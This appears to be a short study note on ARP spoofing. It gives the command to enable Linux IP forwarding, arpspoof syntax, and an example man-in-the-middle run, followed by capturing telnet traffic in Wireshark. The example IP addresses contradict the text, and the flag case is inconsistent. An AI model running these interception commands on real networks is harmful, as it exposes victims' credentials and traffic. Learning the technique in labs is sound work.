⚠️ARP Spoofing

Dsniff Arpspoof

Before running the tool, we have to enable the Linux Kernal IP Forwarding a feature that transforms a Linux box into a router.

By enabling IP forwarding, you tell your machine to forward the packets you intercept to the real destination host.

Command to enable the ip forward feature

echo 1 > /proc/sys/net/ipv4/ip_forward

We can then run arpspoof

Command to use arpspoof

arpspoof -I <interface> -t <target> -r <host>

<interface> = tap0, eth0, etc
<target> = victim ip
<host> = host from where the packets are send

To intercept traffic between 192.168.4.11 and 192.168.4.16 the command to be used is

echo 1 > /proc/sys/net/ipv4/ip_forward arpspoof -i tap0 -t 10.100.13.37 -r 10.100.13.36

We can then run Wireshark to intercept the traffic and filter the traffic with telnet protocol